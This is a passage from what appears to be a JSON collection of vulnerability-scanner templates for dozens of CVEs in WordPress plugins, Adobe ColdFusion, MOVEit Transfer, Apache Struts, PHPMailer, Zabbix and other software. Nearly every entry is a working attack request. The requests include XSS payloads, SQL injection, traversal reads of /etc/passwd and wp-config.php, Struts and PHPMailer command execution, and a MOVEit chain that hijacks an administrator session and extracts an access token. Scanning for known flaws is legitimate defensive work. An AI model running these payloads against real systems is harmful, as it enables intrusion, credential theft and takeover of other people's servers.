/wp-admin/admin.php?page=wc4jp-options&tab=a</script><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\") && contains(body_2, \"woocommerce-for-japan\")"],"condition":"and"}]}]},{"id":"CVE-2023-26360","info":{"name":"Unauthenticated File Read Adobe ColdFusion","severity":"high"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password=","encrypted=true","adobe"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-3479","info":{"name":"Hestiacp <= 1.7.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["debug-panel","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30150","info":{"name":"PrestaShop leocustomajax 1.0 & 1.0.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","contains(tolower(response_1), \"prestashop\")"],"condition":"and"}]}]},{"id":"CVE-2023-35078","info":{"name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/aad/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-34362","info":{"name":"MOVEit Transfer - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nCookie: siLockLongTermInstID=0\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyUsername: Guest\nX-siLock-SessVar1: MyPkgAccessCode: 123\nX-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com\nCookie: siLockLongTermInstID=0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: siLockLongTermInstID=0\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nArg06=123\n","@Host: https://checkip.amazonaws.com\nGET / HTTP/1.1\nHost: checkip.amazonaws.com\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nAccept: */*\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyPkgID: 0\nX-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('{{sessioncookie}}');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET InstId='1234' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET IpAddress='{{ips}}' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET Timeout='60' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET ResilNode='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET AcctReady='1' WHERE SessionID='{{sessioncookie}}'; -- asdf\nCookie: siLockLongTermInstID=0\nContent-Length: 0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0\nContent-Type: application/x-www-form-urlencoded\n\nCsrfToken={{csrf}}&transaction=secmsgpost&Arg01=email_subject&Arg04=email_body&Arg06=123&Arg05=send&Arg08=email%40example.com&Arg09=attachment_list\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{sessioncookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_7","words":["{\"access_token\":"]},{"type":"word","part":"header_7","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ips","regex":["\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b"],"internal":true},{"type":"regex","name":"csrf","group":1,"regex":["name=\"csrftoken\" value=\"(\\w+)\">"],"internal":true,"part":"body"},{"type":"regex","name":"access_token","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body"}]}]},{"id":"CVE-2023-2130","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"Supplier Name\")"],"condition":"and"}]}]},{"id":"CVE-2023-2356","info":{"name":"Mlflow <2.3.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\"}\n","POST /api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\", \"source\": \"file://{{Hostname}}/../../../../../../../\"}\n","GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-38205","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-2982","info":{"name":"Miniorange Social Login and Register <= 7.6.3 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"set_cookie","words":["wordpress_sec_","wordpress_logged_in_"],"condition":"or"},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-0099","info":{"name":"Simple URLs < 115 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body, \"</script><svg/onload=alert(document.domain)>\")","contains(body_2, \"search_term\")"],"condition":"and"}]}]},{"id":"CVE-2023-0630","info":{"name":"Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[slimstat f=\"count\" w=\"author\"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat]\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"audioShortcodeLibrary\")"],"condition":"and"}]}]},{"id":"CVE-2023-23488","info":{"name":"WordPress Paid Memberships Pro <2.9.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nGET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=5","status_code_1 != 403","contains(body_2, \"pmpro_updates\")"],"condition":"and"}]}]},{"id":"CVE-2023-32117","info":{"name":"Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-json/igd/v1/get-users-data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"name\":","\"email\":","\"role\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000137","info":{"name":"WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3088","info":{"name":"Apache ActiveMQ Fileserver - Arbitrary File Write","severity":"critical"},"requests":[{"raw":["PUT /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\n{{rand1}}\n","GET /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1==204","status_code_2==200","contains((body_2), '{{rand1}}')"],"condition":"and"}]}]},{"id":"CVE-2016-4975","info":{"name":"Apache mod_userdir CRLF injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Set-Cookie\\s*?:(?:\\s*?|.*?;\\s*?))(crlfinjection=crlfinjection)(?:\\s*?)(?:$|;)"]}]}]},{"id":"CVE-2016-1000127","info":{"name":"WordPress AJAX Random Post <=2.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6601","info":{"name":"ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3081","info":{"name":"Apache S2-032 Struts - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000153","info":{"name":"WordPress Tidio Gallery <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-8527","info":{"name":"Aruba Airwave <8.2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000155","info":{"name":"WordPress WPSOLR <=8.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000143","info":{"name":"WordPress Photoxhibit 2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000129","info":{"name":"WordPress defa-online-image-protector <=3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000141","info":{"name":"WordPress Page Layout builder v1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000139","info":{"name":"WordPress Infusionsoft Gravity Forms <=1.5.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><\"","input type=\"text\" name=\"ContactId\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10134","info":{"name":"Zabbix - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error in query [INSERT INTO profiles (profileid, userid","You have an error in your SQL syntax"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000148","info":{"name":"WordPress S3 Video <=0.983 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script><\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10033","info":{"name":"WordPress PHPMailer < 5.2.18 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n","POST /wp-login.php?action=lostpassword HTTP/1.1\nHost: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nwp-submit=Get+New+Password&redirect_to=&user_login={{username}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wp-login.php?checkemail=confirm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2016-1000130","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6195","info":{"name":"vBulletin <= 4.2.3 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["type=dberror"]},{"type":"status","status":[200,503],"condition":"or"}]}]},{"id":"CVE-2016-1000133","info":{"name":"WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7834","info":{"name":"Sony IPELA Engine IP Camera - Hardcoded Account","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command/prima-factory.cgi"],"headers":{"Authorization":"Bearer cHJpbWFuYTpwcmltYW5h"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["gen5th","gen6th"],"condition":"or"},{"type":"status","status":[204]}]}]},{"id":"CVE-2016-10956","info":{"name":"WordPress Mail Masta 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd","{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2016-1000135","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000149","info":{"name":"WordPress Simpel Reserveren <=3.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10973","info":{"name":"Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"tab = alert(document.domain);\")","contains(body_2, \"Brafton Article Loader\")"],"condition":"and"}]}]},{"id":"CVE-2016-10367","info":{"name":"Opsview Monitor Pro - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2016-0957","info":{"name":"Adobe AEM Dispatcher <4.15 - Rules Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/console?.css"],"headers":{"Authorization":"Basic YWRtaW46YWRtaW4K"},"matchers-condition":"and","matchers":[{"type":"word","words":["Adobe","java.lang","(Runtime)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10960","info":{"name":"WordPress wSecure Lite < 2.4 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"],"body":"wsecure_action=update&publish=\";} header(\"{{name}}: CVE-2016-10960\"); class WSecureConfig2 {var $test=\"","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["{{name}}: CVE-2016-10960"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000136","info":{"name":"WordPress heat-trackr 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000152","info":{"name":"WordPress Tidio-form <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10993","info":{"name":"ScoreMe Theme - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10924","info":{"name":"Wordpress Zedna eBook download <1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10368","info":{"name":"Opsview Monitor Pro - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin_username={{username}}&login_password={{password}}&login=&back=//www.interact.sh&app=OPSVIEW\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2016-1000134","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000126","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7981","info":{"name":"SPIP <3.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10940","info":{"name":"WordPress zm-gallery plugin 1.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n","GET 